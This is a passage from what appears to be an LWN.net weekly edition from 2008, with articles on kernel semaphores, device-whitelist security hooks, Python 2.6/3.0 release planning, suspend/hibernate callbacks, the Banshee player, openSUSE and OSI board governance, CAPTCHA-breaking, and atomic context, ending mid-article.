The implementation follows from this definition in a straightforward way:
the spinlock is used to protect manipulations of count, while
wait_list is used to put processes to sleep when they must wait
for count to increase.  The actual code, of course, is somewhat
complicated by performance and interrupt-safety considerations, but it
remains relatively short and simple.

One might ask: why weren't semaphores done this way in the first place?
The answer is that, once upon a time (prior to 2.6.16), semaphores were one
of the primary mutual exclusion mechanisms in the kernel.  The 2.6.16 cycle
brought in mutexes from the realtime tree, and most semaphore users were
converted over.  So semaphores, which were once a performance-critical
primitive, are now much less so.  As a result, any need there may have been
for carefully hand-tuned, architecture-specific code is gone.  So the code
might as well go too.

The other question which comes up is: why are semaphores still being used
at all?  The number of semaphore users has dropped considerably since
2.6.16, but there are still a number of them in the kernel.  Some of those
could certainly be converted to mutexes, but doing so requires a careful
audit of the code to be sure that the semaphore's counting feature is not
being used.  Once that work is done, it may turn out that, in some places,
a semaphore is truly the right data structure.  So semaphores are likely to
remain - but they'll require rather less code than before.

		Installfest generates 350 Linux computers for schools


On Saturday March 1st, Untangle and the Alameda County Computer
Resource Center (ACCRC) organized the first of what is hoped to be many
"Installfest for Schools" events.  It took place at four San Francisco Bay area
locations (San Francisco, Berkeley, San Mateo and Novato) and refurbished
350 older computers with Ubuntu for northern California schools.


The primary goal of the installfest was to give children in
disadvantaged neighborhoods the same access to technology that students in
wealthy school districts grow up with.  However, the event was also about
curbing waste.  132 million PCs were bought in the year 2000 alone and none
of them  can run Vista.  But older hardware works great with GNU/Linux and
extending the life of these PCs will keep thousands of tons of toxic
electronic waste out of the landfill.  And let's not forget about budgetary
waste.  With many states facing budget crises that will inevitably force
deeper classroom spending cutbacks, why should our schools to spend their
scarce resources on proprietary software licenses?   In fact, cutbacks may
create an incredible window of opportunity for the GNU/Linux desktop
movement to establish itself within schools. 


The installfest drew approximately 130 free and open source software community
volunteers across the four locations.  We started with over 1,000 older,
discarded computers that had been collected by ACCRC through donations
from the general public, local businesses and municipal governments.  Some
of the computers were smooth sailing: they met the hardware specification, had all
of the necessary components and installed without any problems.  Other
computers had software install problems, but those were easy to solve
because so many of the Bay Area's most hardcore free and open source software gurus participated
and with their combined expertise, no error message went unattended to.
The rest of the computers required a little more care, as many of them were
missing a hard drive, NIC or enough RAM to run Ubuntu.  Yet, by
disassembling problematic boxes it was easy to form a pool of spare parts that
could then be stitched back together to create working computers.  The week
after the installfest, ACCRC put the finished systems through a 72-hour
burn-in test and we now have 350 computers that have already started being
donated to schools.  


The Ascend School in Oakland received the first batch of nine computers.
Other schools that have received open source computers from the ACCRC
include:

Lockwood School (Oakland) 
Whittier Elementary School (Oakland) 
Casa Grande High School (Petaluma)
Woodside Elementary School (Concord)
KIPP San Francisco Bay Academy (San Francisco) 
Mission High School (San Francisco)    

This event was about donating open source computers to schools in Northern
California.  However, ACCRC regularly donates to schools nationwide
(and sometimes internationally).  Schools in need of computers should fill
out ACCRC's school
application form [PDF].


Computer hardware and software specifications


The minimum specifications for each computer were an 800mhz processor (PIII or AMD),
256MB Ram and a 20 GB hard drive, but we were pleasantly surprised to find a
handful of P4 processors in the mix as well.  One location even received a
batch of 6 dual core systems with elegant slim cases—who throws those out
and what else are they looking to get rid of?—but ironically we couldn't
install them during the event because they were only equipped with DMS-59
DVI ports that required special monitor cables. 


Each system received a fresh copy of Ubuntu 7.10 desktop with the latest
apt-get upgrade applied as of February 27, 2008.  Because the computers
were going into schools with little or no GNU/Linux expertise, it was
important to try and create a positive first experience so we worked with
Creative Commons to package samples of pictures from Flickr and music
from Jamendo to show off the fun side of the donated computers.  No
Starch Press also donated PDF copies of Ubuntu for non-Geeks that were
loaded on to each computer so that help for common support questions was never
more than a click away. 

Install specifications

Each location was set up with 10 to 40 workstations that had permanent
keyboards, mice, monitors and cables so that the volunteers only had to
move the desktops themselves back and forth.  The process was started by
booting from custom install CDs and the packages were applied over the
network via apache http web servers.  The custom CDs were optimized to make
the Ubuntu OS installation as fast and easy as possible.  Physically
placing the CD into the drive and booting from disc was really all that was
required because the additional content from Creative Commons and No Starch
Press were bundled as Debian packages that were automatically installed via
the network just like the other Ubuntu updates and patches. 


The installfest networks were based on dual Pentium III servers with a RAID array and Gigabit network cards plugged into a 24-port Gigabit
switch.  It was important to have a fast setup because updating as many as
40 systems at once placed a heavy load on drives and network connections.
Electricity was also a concern as most of the outlets available had 15 or
20 Amp circuits.    Given the intensity of the installation/reboot workload
and the relatively power inefficient CRT monitors, we drew the line at 5
workstations per 15 Amp circuit because an extra machine might have fit,
but blowing the circuit breaker would have caused a big
disruption—especially if the breaker happened to be in a locked closet.  

Community goes the extra mile

With 130 volunteers showing up, Untangle and ACCRC really had a lot of help
in pulling the Installfest for Schools off.  However, the community did far
more than just show up, our volunteers really went the extra mile to save
the day on as we stumbled across a handful of unexpected hiccups.  One
particularly inspirational moment was when the San Mateo location ran out
of computers, our volunteers drove their own cars across the Bay to pickup
extra hardware rather than close the location early!  We also owe a debt of
gratitude to 3 members of the San Francisco Linux Users' Group (Christian
Einfeldt, Jim Stockford and Daniel Mizyrycki), who worked long hours to set up
and clean up that location.   


We also received lots of help from free and open source software related
organizations.  Mozilla in
particular really stepped up to the plate by blogging about the event and then
bringing schwag and pizza for all 130 volunteers!  But Mozilla wanted to
get their hands dirty as well and Mozilla team members showed up to lend a
hand at each location.  Creative Commons and the No Starch Press helped
put together content.  Also, O'Reilly,
OSI, the Linux Foundation, Sun and
Canonical really helped get the word out with supportive blog mentions that
encouraged participation as well.

Future plans

Moving forward, Untangle and ACCRC hope to continue organizing bigger
and better Installfests for Schools.  Our goal is to turn the one-time
regional event into a distributed national event occurring on a regular
basis.  If we're able to find some friendly organizations to help out,
we may even be able to go international.  Stay tuned because you'll be
hearing from us sooner rather than later about the next Installfest for
Schools.  


Anyone wishing to help should stay informed by signing up for the
installfest mailing list.  As we move more into a distributed
national event, we need all of the help that we can get identifying local
schools, old computer donors and feet on the street volunteers to make sure
everything goes smoothly.  That work will be coordinated on the mailing list.


[ Andrew Fife, of Untangle, is one of the organizers of the project. ]

		The return of authoritative hooks


The containers developers have what would seem to be a relatively
straightforward problem: they would like to control access to devices on a
per-container basis.  Then containers could safely be granted access to
specific devices without compromising the overall security of the system -
even if a container has a root-capable process which can create new device
files.  Implementing this feature has been a longer journey than these
developers had imagined, though, with the "device whitelist" feature being
sent around to different kernel subsystems almost like one of those famous
garbage barges from years past.  A final resting place may have been found, though, and it
may signal a change in how some security decisions are made in the kernel
in the future.


The original version of the
patch, posted by Pavel Emelyanov, set up a control group for the management
of device accessibility within containers.  The actual rules - and their
enforcement - were stored deep within the device model subsystem.  This
drew an objection from Greg Kroah-Hartman, who suggested that, instead,
this kind of access control should done either with udev or with the Linux
security module (LSM) subsystem.  Udev does not give the desired degree of
control and, apparently, can be problematic for those wanting to run older
distributions within containers, so it was not seriously considered.  The
LSM suggestion was, after some resistance, taken to heart, though.


The result was the  device
whitelist LSM patch, posted by Serge Hallyn.  It was a stacking
security module which made changes to a number of hooks.  This is where
James Morris came in and suggested that,
instead, the whitelist should just be added to the existing capabilities
security module.  Then there would be no need for a separate module and
things could be generally simplified.


So Serge duly rolled out version 3 of the
patch which moved the whitelist into the capabilities module.  But this
one ran into resistance as well.  Quoting James
Morris again:


	Moving this logic into LSM means that instead of the cgroups
	security logic being called from one place in the main kernel
	(where cgroups lives), it must be called identically from each LSM
	(none of which are even aware of cgroups), which I think is pretty
	obviously the wrong solution.


Casey Schaufler also didn't like this idea:


	When the next feature comes along are we going to stuff it into
	capabilities, too? Maybe we'll cram it into audit or CIPSO instead,
	but how long can this go on?  Eventually we need a mechanism that
	allows more or less general mix-and-match, maybe with a few rules
	like "don't mix plaids and stripes" to keep things sane or these
	lesser facilities have no chance. Seems like we're still making LSM
	too hard to use


At this point, the complaint was clearly not with just the device
whitelist, but with the capabilities module as well.  It seems that
capabilities are a bit of a poor fit with the LSM idea as a whole.  The
fact that they exist at all is a bit of a historical artifact; some
developers wanted to see them implemented that way to show the flexibility
of the LSM interface and to let capabilities be omitted from embedded
setups.  As it happens, it's still not possible to remove capabilities, and
they impose a bit of a cost on all other security modules.


The core problem is this: LSM, fundamentally, is a restrictive mechanism.  An
LSM hook can deny an action, but it can never empower a process to do
something it would not have been allowed to do in the absence of the
security module.  The decision to disallow "authoritative hooks" was made explicitly back in
2001 as a way of restricting the scope of LSM modules and, hopefully,
ensuring that those modules would not themselves become security problems.


But capabilities are an inherently authoritative mechanism - a capability
check verifies the existence of a special permission which would otherwise
not be there.  The device whitelist is the same sort of thing: it grants
access which would otherwise be denied.  So it fits poorly with the LSM
model.


Serge came back with yet another
patch which takes the whitelist code out of the LSM framework and,
instead, inserts a separate set of hooks into the relevant places in the
code.  Those hooks sit right next to the LSM hooks, but operate in a
permissive manner.  So far, this approach seems to be passing muster, with
no developers (yet) talking about booting it out into yet another
subsystem.


Things may yet change, though.  Casey Schaufler is now talking about the creation of a "Linux
privilege module" framework for the management of all permissions checks.
The normal discretionary access control checks could be moved there, as
could all capability and "are they root?" logic.  And, of course, the
device whitelist code.  Nobody has really spoken out against this idea -
but, then, nobody has seen any code yet either.  But, if things continue in
this direction, authoritative hooks may have finally found a home, many
years after having been rejected from the LSM mechanism.

		Python gears up for 2.6 and 3.0


Things are heating up in the Python world in advance of two major
synchronized releases of the language.  As it heads towards Python 3000
(aka Py3k or Python 3.0), alongside the transitional version 2.6, the development team is narrowing its focus to
just those items that are required for the releases.  Along the way, the
conversations taking place on python-devel provide a look inside the
development and release process decisions that a project needs to make as
releases loom.


Py3k is the next-generation version of Python, as we described last September.  It
will not be backward compatible with programs written for Python 2.x in a
wide variety of ways.  Python 2.6 is an effort to bridge the gap, enabling
much of the 3.0 functionality so that new programs can start using it.  It
can 
also provide warnings for code that will not work with Py3k.


Python 2.6 was originally scheduled for an April 2008 release, in advance of the August
2008 release planned for Py3k.  Now the two are slated for synchronized
releases, roughly monthly, until the final release now scheduled for early
September 2008.  The synchronization is seen as important for two reasons
as Python's Benevolent Dictator For Life (BDFL) Guido van Rossum outlines:

Not only could
this potentially save the release manager and his assistants some
time, doing the final releases together sends a clear signal to the
community that both versions will receive equal support.


Because Py3k is such a radical change, the 2.x series will continue for a
long time.  van Rossum's recent PyCon keynote (PDF
slides) mentions five years as the time frame for 2.6 to be supported,
with 2.7 and 2.8 releases possible.  A stable development platform for the
next few years is very
important for current Python users as is giving them a long time to migrate their
code.   


The third alpha of Py3k was released at the end of February along with the first
alpha of 2.6.  Additional alpha releases of each are slated for April and
May as laid out in Python Enhancement Proposal
(PEP) 361.  Those are to be followed by betas in June and July with the
final release planned for September 3.  All of that adds up to a fairly
aggressive schedule, but the team seems confident—at least so far.


One of the issues that the Python hackers are trying to figure out is how
to track the items still left to be done.  van Rossum describes the scope
of the
problem:

In order to make such a tight release schedule we should try to come
up with a list of tasks that need to be done, and prioritize them.
This should include documentation, and supporting tools like 2to3. It
should include features, backports of features, cleanup, bugs, and
whatever else needs to be done (e.g. bugbot maintenance).


No one had any major objections to van Rossum's suggestion of using the bug tracker to track the tasks, with
Christian Heimes pointing out:

Despite the url bugs.python.org it's an issue tracker and not a bug
tracker. We track patches, feature requests, ideas and bugs in the same
tracker.


The bug tracker allows for different priorities to be set on bugs (or
tasks) that are entered into it, which led van Rossum and others to wonder
about the proper usage of that field.  One of the problems is
distinguishing between issues that must be addressed before the next
release versus those that must be addressed sometime before the final
release.  In some sense, both are "critical" and "show-stopping" (depending
on which show you are focused on).  Brett Cannon reported the scheme they came up
with: 

So "release blocker" blocks a release. "Critical" could very easily
block a release, but not the current one. "High" issues should be
addressed, but won't block anything. "Normal" is normal. And "low" is
for spelling errors and such.


This can elevate bugs that are relatively minor, but need to be handled
before a final release, into a category that inflates their importance.
But, not elevating the bugs can lead to them incorrectly being set aside
for a later release.  van Rossum wondered about this bug priority
"inflation", but it
is the way that 2.6/3.0 release manager Barry Warsaw wants to handle things:

Critical is the right one to use.  
Neal and I will basically be moving  
issues between 'release blocker' and 'critical' with the former  
meaning this issue blocks the upcoming release.


Other projects or project managers might make different decisions on how to
handle bug priorities, but the important thing is to make a reasonable
decision quickly.  Once that was done, the tasks were added to the tracker
and could be prioritized correctly within the framework and without a lot of hand-wringing about
which way is "best".  It is an important skill for project managers of all
kinds to learn.


Things are progressing rapidly on python-devel these days—not
surprising with two major releases due in less than six months.  There is a lot
of work to be done, but the Python hackers aren't shrinking from those
tasks.  In addition, the team has also been able to change their processes as
needed to support their tight schedule.  With hard work and a bit of
luck that should put Py3k and its 2.6 sibling on our development machines
by autumn.


		A new suspend/hibernate infrastructure


While attending conferences, your editor has, for some years, made a point
of seeing just how many other attendees have some sort of suspend and
resume functionality working on their laptops.  There is, after all,
obvious value in being able to sit down in a lecture hall, open the lid,
and immediately start heckling the speaker via IRC without having to wait
for the entire bootstrap sequence to unfold.  But, regardless of whether
one is talking about suspend-to-RAM ("suspend") or suspend-to-disk
("hibernation"), there are surprisingly few people using this capability.
Despite the efforts which have been made by developers and distributors,
suspend and hibernate still just do not work reliably for a lot of people.  

For your editor, suspend always works, but the success rate of the
resume operation is about 95% - just enough to keep using it while
inspiring a fair amount of profanity in inopportune places.


Various approaches to fixing suspend and hibernation have been proposed;
these include TuxOnIce and kexec jump.  Another
possibility, though, is to simply fix the code which is in the kernel now.
There is a lot that has to be done to make that goal a reality, including
making the whole process more robust and separating the suspend and
hibernation cases which, as Linus has stated rather strongly several times,
are really two different problems.  To that end, Rafael Wysocki has posted
a new suspend and hibernation
infrastructure for devices which has the potential to improve the
situation - but at a cost of creating no less than 20 separate device
callbacks.


For the (relatively) simple suspend case, there are four basic callbacks
which should be provided in the new pm_ops structure by each bus
and, eventually, by every device:


When the system is suspending, each device will first see a call to its
prepare() callback.  This call can be seen as a sort of warning
that the suspend is coming, and that any necessary preparation work should
be done.  This work includes preventing the addition of any new child
devices and anything which might require the involvement of user space.
Any significant memory allocations should also be done at this time; the
system is still functional at this point and, if necessary, I/O can be
performed to make memory available.  What should not happen in
prepare() is actually putting the device into a low-power state;
it needs to remain functional and available.

As usual, a return value of zero indicates that the preparation was
successful, while a negative error code indicates failure.  In cases where
the failure is temporary (a race with the addition of a new child device is
one possibility), the callback should return -EAGAIN, which will
cause a repeat attempt later in the process.

At a later point, suspend() will be called to actually power down
the device.  With the current patch, each device will see a
prepare() call quickly followed by suspend().  Future
versions are likely to change things so that all devices get a
prepare() call before any of them are suspended; that way, even
the last prepare() callback can count on the availability of a
fully-functioning system.

The resume process calls resume() to wake the device up, restore
it to its previous state, and generally make it ready to operate.  Once the
resume process is done, complete() is called to clean up anything
left over from prepare().  A call to complete() could
also be made directly after prepare() (without an intervening
suspend) if the suspend process fails somewhere else in the system.


The hibernation process is more complicated, in that there are more
intermediate states.  In this case, too, the process begins with a call to
prepare().  Then calls are made to:


The freeze() callback happens before the hibernation image (the
system image which is written to persistent store) is created; it should
put the device into a quiescent state but leave it operational.  Then,
after the hibernation image has been saved and another call to
prepare() made, poweroff() is called
to shut things down.

When the system is powered back up, the process is reversed through calls
to:


The call to quiesce() will happen early in the resume process, 
after the hibernation image has been loaded from disk, but before it has
been used to recreate the pre-hibernation system's memory.  This callback
should quiet the device so that memory can be reassembled without being
corrupted by device operations.  A call to complete() will follow,
then a call to restore(), which should put the device back into a
fully-functional state.  A final complete() call finishes the
process.

There are still two more hibernation-related callbacks:


These functions will be called when things go wrong; once again, each of
these calls will be followed by a call to complete().  The purpose
of thaw() is to undo the work done by freeze() or
quiesce(); it should put the device back into a working state.
The recover() call will be made if the creation of the hibernation
image fails, or if restoring from that image fails; its job is to clean up
and get the hardware back into an operating state.


For added fun, there are actually two sets of pm_ops callbacks.  One
is for normal system operation, but there is another set intended to be
called when interrupts are disabled and only one CPU is operational - just
before the system goes down or just after it comes back up.
Clearly, interactions with devices will be different in such an
environment, so different callbacks make sense.  But the result is that
fully 20 callbacks must be provided for full suspend and hibernate
functionality.  These callbacks have been added to the bus_type
structure as:


Fields by the same name have also been added to the pci_driver
structure, allowing each device driver to add its own version of these
callbacks.  For now, the old PCI driver suspend() and
resume() callbacks will be used if the pm_ops structures
have not been provided, and no drivers have been converted (at least in the
patch as posted).

As of this writing, discussion of the patch is hampered by an outage at
vger.kernel.org.  There are some concerns, though, and things are likely to
change in future revisions.  Among other things, the number of "no IRQ"
callbacks may be reduced.  But, with luck, the final resolution will leave
us all in a position where suspend and hibernate work reliably.

		The Banshee Music Management and Playback Utility


The Banshee project
is creating a music management and playback utility for the GNOME
desktop.  The Banshee home page states:


Import, organize, play, and share your music using Banshee's simple, powerful interface.
Rip CDs, play and sync your iPod, create playlists, and burn audio and MP3 CDs. Most portable music devices are supported.
Banshee also has support for podcasting, smart playlists, music recommendations, and much more.


Version 1.0 Alpha 1 (0.98.1) of Banshee has been
announced.
New features in this release include:

A code rewrite with an emphasis on performance improvements and better resource usage.
 A new Album Browser feature with the ability to display album artwork.
 A Play Queue feature for building on-the-fly music playlists.
 New search capabilities for locating artists, albums and song titles.
 Integration with the Last.fm music sharing service.
 A built-in 10 band audio equalizer.
 The new ability to play from a playlist while browsing new sources.


The version 1-0.98.1

change log file has more detailed information on the new release.

<!-- LWNPutAdHere -->

This 1.0 alpha release of Banshee is missing a number of features that were present in the earlier 0.13.2 version.  There is no support for hardware
devices yet, so it is not possible to import or burn CDs, talk to iPod
devices or deal with USB or MTP devices.  Numerous plugins have also
been left out, so it is not possible to access podcasts, internet radio,
music sharing services, etc.  The release announcement states:


Do not despair, these features will be added back before the final 1.0 release. Many hardware related features are projected to land in the Alpha 2 and 3 releases of Banshee 1.0. We expect releases in quick succession leading up to the final 1.0 release.

Banshee 1-0.98.1 was installed on a system running an Athlon XP 1700
processor and 512MB of RAM.  The operating system was the alpha 6
release of Ubuntu Hardy Heron for i386.
The following steps were required to get the software running:


Banshee fired up as expected.  Your author converted a few CDs
to flac files and copied them to the system for testing.
It did not take much effort
to figure out how to play individual tracks and build playlists.
The standard play/pause buttons and skip to previous or next track
buttons worked as one would expect.  The built-in equalizer worked,
although it tended to produce audible clipping if a frequency band
was turned up too high.


Unlike earlier versions of Banshee,
the only internet music channel shown in version 1.0 was Last.fm.
It was possible to use the standalone last.fm binary to access the
site, but Banshee was only able to list the selections, not play them.
The error message: don't know how to handle audio/mpeg...
led to the source of the problem.  The installation page was
consulted, a large collection of
gstreamer0.10-plugins were installed with the Synaptic package
manager, and Banshee was restarted. Last.fm content came through
loud and clear.
One final issue was noticed with Banshee.  When the application was
run from the command line and exited using the GUI, it left the
GNOME terminal in a locked-up state.


Future releases of Banshee will likely include fixes for
some of the aforementioned issues.  Banshee is an interesting
application that can be used for combining a wide variety
of audio listening functions into one place.


		Electing the openSUSE board


The openSUSE project takes another step
in becoming a true community project.  The current openSUSE board, appointed by
Novell, will soon be replaced by an elected board.  The question that is
being debated on the opensuse-project
mailing list is "Who can vote for the openSUSE board?"

Among the openSUSE community there are Members and a larger number of Users.  ""openSUSE Members"
are specifically distinguished contributors who have brought a continued
and substantial contribution to the openSUSE project. They are approved by
the openSUSE board."
Becoming a user is as easy as registering on the wiki.

Some possible answers to the "who can vote" question include:

 members only
   anyone  (members + registered users)
   members + non-members vouched for by members
   members + users who have signed the Guiding
  Principles


At this time the number of members is low.  There are concerns that having
members (who are appointed by the board) as the only voters for the board
could exclude the greater community.  On the other hand opening up
elections to the greater user community is difficult to police.  It should
be verifiable that those who are eligible to vote have only one vote
counted.  Other projects may serve as a guide for this issue.

Debian has the Debian Voting
Information page which defines how voting is done and how votes are
counted.  Debian restricts voting to Debian Developers (DDs), who much sign
their vote with their key which is also on the official keyring.  DDs may
vote more than once, but only the last vote is counted, so voting is
restricted and it's easy to insure one-vote-per-person.

The Fedora project has defined Fedora Board
Elections more recently than Debian.  This document states that 5 of 9
seats on the board are appointed by the board.  Voting is open for the
remaining seats to those who have a valid account in the Fedora Account
System.  Getting an account on the
Fedora Account System requires an application and approval process that
is somewhat similar to becoming an openSUSE Member.

The GNOME Foundation
Elections process was also raised as a model.  GNOME membership is open to
any contributor willing to go through the application process.

Given those three examples it does seem that voting privileges are
typically restricted to a subset of the community that has made both a
commitment and continuing contributions to the project.  The main
difference is that openSUSE membership is relatively new and is therefore a
small segment of the greater community.  Over time the membership will grow
and members only elections may become more appealing.  In any case, the
procedures that are defined for this election may be changed for subsequent
elections.

		Breaking CAPTCHA


Perhaps someday it will be considered discrimination against a sentient,
but these days a way to distinguish between programs and humans is required
for many web-based applications.  Keeping spambots from posting comments in
weblogs or other bots from signing up for a web service are two of the most
common applications for separating humans and bots.  As has often been the
case in the past, though, when the stakes are high enough, attackers will
find ways to circumvent barriers like this.


The most common means of testing for humans in web site sign-ups and the
like is a CAPTCHA
(Completely Automated Public Turing test to tell Computers and Humans
Apart).  Typically these are images that contain some text that has been
mangled so that it is still recognizable by humans, but not by
programs—at least that is the theory.  Variations on the theme
include asking math or "common sense" questions that programs
will supposedly not be able to figure out—more likely no
attacker has had enough interest breaking them.  Serious CAPTCHAs
tend to use images that can be created on the fly, giving nearly infinite
variety. 


Some of the most sophisticated CAPTCHAs are those used by various free web
mail services: Hotmail, Yahoo, and Gmail.  These services provide quite a
bit of storage that might be of use to an attacker, but they also lend
their reputation to mail that gets sent from those accounts.  Domains like
yahoo.com and gmail.com are very unlikely to be blacklisted.  Mail coming
from those domains may also score lower in various spam testing rules,
which may be exactly what an attacker is looking for.


Various techniques have been tried in the past to circumvent CAPTCHAs, with
the most successful ones using humans.  It seems that many folks will
happily solve
CAPTCHAs in order to view pornography or for cash.
Over the last year, though, CAPTCHA-breaking programs have started to appear.


In a very
detailed report, Websense presents evidence that Gmail's CAPTCHA has
been cracked.  Earlier reports indicate that attackers have cracked
Yahoo, Windows Live, and Hotmail CAPTCHAs as well.  Cracked does not mean
100% success rate—humans cannot even achieve that—it just needs
to work often enough to provide the attackers with the accounts they want.


These programs use some image processing and optical character recognition
(OCR) techniques to decipher the puzzle, removing humans from the equation
entirely.  Typical success rates are in the 20-35% range.  For attackers
with botnets available to spread out the work, this could yield an amazing
number of accounts in relatively short order.


CAPTCHAs have a number of bad characteristics: they are annoying to most
and unusable by those who are visually impaired.  Yet they are pervasive.
Alternate techniques using audio have so far been found wanting; a more
interesting method is Asirra from Microsoft
Research. 


Asirra uses 3 million images of dogs and cats from animal shelters that
have been categorized.  The test then shows a dozen random
images from the database and asks the "human" to select all the cat
photos.  This would seem much more difficult for a program to handle.  The
picture database would need regular updates to thwart attackers just
collecting all the images and doing their own categorization—perhaps with
help from porn viewers or poor folk.  Also, 
computer recognition systems will someday be able to recognize dogs and cats.


It is a difficult problem to solve, but one that needs to be addressed.
Systems like OpenID are not
enough—it is not what they were designed for—as there is nothing stopping bots from having
OpenIDs.  Some mechanism that would allow reputation or trust to accumulate on a
given ID might help prove that its holder is a human—or at least a
well-behaved bot.  Designing a reputation service that is decentralized will also be difficult, but it is the right direction for
solving these kinds of problems.


		Bruce Perens and the OSI board


The Open Source Initiative (OSI) was
formed almost ten years ago to safeguard the "Open Source" name.  Over the
years it has approved licenses and attempted some other activities while,
generally, having little relevance to the wider community.  It has often
been seen as a relatively closed and non-democratic organization.  Now one
of OSI's founders is trying to get back into the organization and change
its direction; the outcome of the resulting discussion may (or may not)
change the direction of the OSI.


Bruce Perens has launched a bid to be elected to the OSI
board of directors, but this bid has
not been particularly well received by the current board.  His on-line petition to collect community support
specifies a number of reasons that he wants to be on the board—those
reasons are ruffling some feathers.  Outgoing board member Matt Asay has taken Perens to
task for some of his statements as has OSI president
Michael Tiemann.


Perens's reasons for wanting to be on the board are threefold: reducing the
over-representation of vendors, trying to ensure Microsoft does not get a
seat on the board, and reducing license proliferation.  The idea of a Microsoft seat on
an open source organization's board is sure to rile a segment of the
community, which is undoubtedly part of what Perens is hoping for.  The
likelihood of that happening is pretty small, though.  Tiemann makes it
clear that the board doesn't elect companies at all:

The OSI nominates people to the board despite their corporate affiliations,
not because of them. The idea that the OSI would elect a "Microsoft" board
member is as absurd as the idea that we'd elect a "Google" board member or
an "IBM" board member. We elect people based on their own merits, not the
merits (or demerits) of the companies or organizations they are affiliated
with. 


Microsoft and its employees do not currently contribute to open source in
any substantial
way, so there is little that would lead the board to nominate them.  If that ever
changes, it would be pretty disingenuous to deny someone a seat because of
their employer's past—or even at that time,
current—misbehavior.  In addition, it is hard
to see how one board member—Perens or someone "controlled" by
Microsoft—is going to make such a crucial difference in what the board
does anyway.  In many ways, the Microsoft connection is
a red herring—one sure to rally the troops, though. 


Reducing license proliferation is a noble goal, one that the OSI tried to
tackle a few years back without much in the way of tangible success.
Perens states that he would like to see OSI do more reduce the number of
licenses, but his claims about the number of licenses needed have raised
eyebrows:

Another problem is the failure to reduce the number of different licenses
in general use. My own work in this area shows that only four licenses, all
compatible with each other, can satisfy all common business and
non-business purposes of Open Source development. Three of these licenses
have essentially the same text, and the fourth is very short. Life would be
easier if more projects used them. While it would be difficult to shut down
approval of new licenses, I think OSI could be more proactive at reducing
license proliferation.


Part of the reason that Tiemann and others are skeptical is due to some
obvious bad blood between the board and Perens over the license
proliferation committee.  LWN covered some of that "debate" in
August 2005. Perens clearly believes he should have been a
member just as strongly as others on the board seem to feel he should not
have been.  When the board was formed without him as a member, Perens
refused to participate in the process in any way.  It 
seems to stick in the craw of some for Perens to now claim that he has the
solution.  Russ Nelson, former OSI president and current board
member—as well as a member of the committee—sums up the
frustration in a comment on Tiemann's post:

I don't see how Bruce can claim to have a short list of four licenses. I
start with BSD, GPLv2, GPLv3, LGPLv2 and LGPLv3 and that's five. If he
thinks that people should simply agree with him that all GPLv2 should be
relicensed GPLv3, I invite him to spend some time with Linus Torvalds, who
notoriously and politely disagrees.

Having a solution is not the same as convincing people to adopt it.


It is rather interesting to see Perens trying to get back on the board that
he famously resigned from in 1999
after having founded the organization with Eric Raymond in 1998.  This is
not the first time Perens has lost interest and/or resigned from some form of community
leadership position; Debian and UserLinux spring to mind.  Though none of
the expressed concerns about his candidacy have mentioned it, some must be
wondering how long it would be before ideology or a shifting focus caused
Perens to move on from a board position if he were elected.


Perens has been an excellent advocate for free software and/or open source
over the years, but his tendency towards self-promotion
grates on some.  It may not be an ego thing, as he claims, but it certainly
rubs some people the wrong way.  The ego issue is one of the reasons that board observer Andrew Oliver does
not support Perens for the board:

A return to a very Amerocentric hacker culture voice with big egos is not
the answer to OSI's problems. I think OSI is on the path to real
fundamental change. I'd like to hear Bruce explain what he'd do differently
in collaboration with others who may not always agree with him.


Asay certainly doesn't see Perens as
having the right credentials either:

The OSI needs a vibrant membership of those currently shaping the open
source landscape. It's possible that its current make-up doesn't reflect
this. Point well taken. But it's equally possible - indeed, I'd say
probable - that Bruce's directorship wouldn't change this. I like Bruce but
aside from the occasional picketing he does, I can't point to anything
substantive he has done for open source in the past half-decade or so.


The petition drive came about because Tiemann encouraged Perens to show
that there was strong community support for him to be a part of the board.
As of this writing, the petition has garnered more than 1700 "signatures",
which Perens believes is enough:

Regarding my candidacy, OSI's board, through its president, asked me to
show an uprising of strong community support if the board was to to elect
me. I have. Now that I have done what you asked, are you going to hide
behind complaints about my campaign, which is really quite mild in its
criticism and is in no way the "scorched earth" that Matt refers to, or are
you going to do what you said? If you OSI can't handle a political opponent
on my laid-back scale, you'd only looking for yes-men.


The OSI board is "self-replacing" with current board members nominating and
electing candidates for empty slots.  Each director serves for a three-year
term, with roughly one-third coming up for election each year—though
this year there are five slots to be filled.  Three directors are standing
for re-election, leaving two slots open.  Unfortunately, it's not clear
when the actual election will be held, nor is there likely to be any
advance notice of who has been nominated.  Transparency, it seems, is not
one of the attributes of OSI.


Self-replacement and overlapping terms of office tend to give a certain
stability to a board, but it also creates a kind of inbreeding.  It is
unlikely that a board will nominate people who think substantially
differently from themselves.  This is one thing that Perens is trying to
circumvent with his very public candidacy.  Whatever else can be said about
Perens's candidacy, it is clear that he would bring a different voice into
the OSI boardroom.


But, what is OSI really?  Is it an organization that is somehow
supposed to represent all of the diverse voices in the community?  At the moment it appears to exist for
the purpose of approving licenses and "protecting the Open Source Definition".
Perens thinks it could be more than that.  OSI itself seems to agree as
they have been moving towards more relevance in the community.  Oliver
describes that effort:

OSI is trying to solve its problems, by becoming more grassroots and less
bottom up. Meanwhile, it is trying to grow the movement by expanding its
international representation. Corporations do influence OSI, in that not
all of the board has a free hand to say what is on their mind
publicly. However, the solution is to make the OSI board what it should
be: a governance board.


OSI and its board are currently in a state of flux, trying to define a
role for themselves that is broader than just a license approval body.  There
doesn't seem to be a lot of discontent within the board that might
lead to Perens or another controversial figure being added.  Whether this
leads to continued stagnation or a more vibrant OSI remains to be seen.  A
more interesting question might be: will anyone care?


If OSI starts to do visible things for the community, it will finally
acquire some relevance.  Given the attitude towards his candidacy, it seems
unlikely that Perens will be able to lead the board in that direction.
Which leaves it up to the current board and the two new
members—neither of which are likely to be Perens—to find a way
to make the community care.


		Atomic context and kernel API design


An API should refrain from making promises that it cannot keep.  A recent
episode involving the kernel's in_atomic() macro demonstrates how
things can go wrong when a function does not really do what it appears to
do.  It is also a good excuse to look at an under-documented (but
fundamental) aspect of kernel code design.

Kernel code generally runs in one of two fundamental contexts.  Process
context reigns when the kernel is running directly on behalf of a (usually)
user-space process; the code which implements system calls is one example.
When the kernel is running in process context, it is allowed to go to sleep
if necessary.  But when the kernel is running in atomic context, things
like sleeping are not allowed.  Code which handles hardware and software
interrupts is one obvious example of atomic context.  


There is more to it than that, though: any kernel function moves into
atomic context the moment it acquires a spinlock.  Given the way spinlocks
are implemented, going to sleep while holding one would be a fatal error;
if some other kernel function tried to acquire the same lock, the system
would almost certainly deadlock forever.  


"Deadlocking forever" tends not to appear on users' wishlists for the
kernel, so the kernel developers go out of their way to avoid that
situation.  To that end, code which is running in atomic context carefully follows a
